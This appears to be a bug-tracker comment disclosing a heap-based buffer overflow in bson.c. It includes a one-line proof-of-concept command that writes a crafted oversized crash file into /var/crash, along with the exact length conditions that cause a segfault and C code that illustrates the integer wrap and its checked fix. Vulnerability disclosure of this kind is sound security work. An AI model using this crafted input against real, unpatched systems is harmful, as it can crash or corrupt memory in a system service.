Comment 3 for bug 1872560

Seong-Joong Kim (sungjungk) wrote : Re: heap-based buffer overflow in bson.c

I would like to update the contents of 'Attack Scenario'.

from:
$ python -c "print('A' * 0xFFFFFFFF + ' : ' + 'B')" > /var/crash/fake.crash

to:
$ python -c "print('A' * 0xFFFFFFFE + ' : ' + 'B')" > /var/crash/fake.crash

Segfault can arise when the following requirements are met, as I mentioned above.
- length of ‘value’ in .crash file => 0 < {length of ‘value’} < 1024
- length of ‘key’ in .crash file => UINT32_MAX - {length of ‘value’} - 7 < {length of ‘key’} < UINT32_MAX

Please check this issue.
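The two length conditions above describe a 32-bit wrap in the element size computation. The following C is an added illustration, not code from the report or from bson.c: it assumes the 7-byte overhead is the BSON string element framing (type byte, key NUL, 4-byte value length, value NUL), shows how an unchecked uint32 sum wraps to a tiny size for lengths inside the reported window, and shows the overflow-checked computation that rejects them.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Assumption (not stated in the report): 1 type byte + key NUL + 4-byte
 * value length + value NUL = 7 bytes of framing, matching the "- 7" above. */
#define BSON_STRING_OVERHEAD 7u

/* Naive 32-bit size computation: silently wraps when the sum exceeds UINT32_MAX,
 * so a buffer sized from it would be far smaller than the data copied into it. */
uint32_t element_size_unchecked(uint32_t key_len, uint32_t value_len)
{
    return key_len + value_len + BSON_STRING_OVERHEAD;
}

/* Checked version: widens to 64 bits, refuses sizes that do not fit in
 * 32 bits and leaves *out untouched on failure. */
bool element_size_checked(uint32_t key_len, uint32_t value_len, uint32_t *out)
{
    uint64_t total = (uint64_t)key_len + value_len + BSON_STRING_OVERHEAD;
    if (total > UINT32_MAX)
        return false;
    *out = (uint32_t)total;
    return true;
}

/* True when the lengths fall inside the window the report describes:
 * 0 < value_len < 1024 and UINT32_MAX - value_len - 7 < key_len < UINT32_MAX. */
bool in_reported_window(uint32_t key_len, uint32_t value_len)
{
    if (value_len == 0 || value_len >= 1024)
        return false;
    uint32_t lower = UINT32_MAX - value_len - BSON_STRING_OVERHEAD;
    return key_len > lower && key_len < UINT32_MAX;
}

int main(void)
{
    /* Constructed lengths matching the updated scenario: key of 0xFFFFFFFE bytes, value "B". */
    uint32_t key_len = 0xFFFFFFFEu, value_len = 1, size;
    printf("inside reported window: %s\n", in_reported_window(key_len, value_len) ? "yes" : "no");
    printf("unchecked uint32 size : %u (wrapped)\n", element_size_unchecked(key_len, value_len));
    printf("checked size          : %s\n",
           element_size_checked(key_len, value_len, &size) ? "ok" : "rejected, would overflow");
    return 0;
}
```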